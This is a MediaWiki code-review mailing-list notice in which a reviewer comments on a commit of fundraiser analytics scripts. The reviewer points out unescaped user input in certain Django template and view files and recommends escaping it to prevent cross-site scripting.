User "Awjrichards" posted a comment on Wikimedia.r205. Full URL: http://www.mediawiki.org/wiki/Special:Code/Wikimedia/205#c18919 Commit summary:
moving the contents of http://svn.wikimedia.org/viewvc/mediawiki/trunk/fundraiser-statistics/fundraiser-scripts/ for fundraiser analytics and reporting to the wikimedia repository Comment: When user input might be displayed back to the user, you should make sure it is escaped to prevent XSS (take a look at the XSS section here: http://www.djangobook.com/en/beta/chapter20/) This is an issue in some of the template files, for instance /trunk/fundraiser-analysis/web_reporting/templates/tests/index.html and I suspect this is an issue in others as well. Also, dunno if you're using LML in the django project, but I see unescaped user input in there as well - in /trunk/fundraiser-analysis/web_reporting/LML/views.py I'll be taking a look at the DataLoader/DataHelper and other classes later. _______________________________________________ MediaWiki-CodeReview mailing list [email protected] https://lists.wikimedia.org/mailman/listinfo/mediawiki-codereview
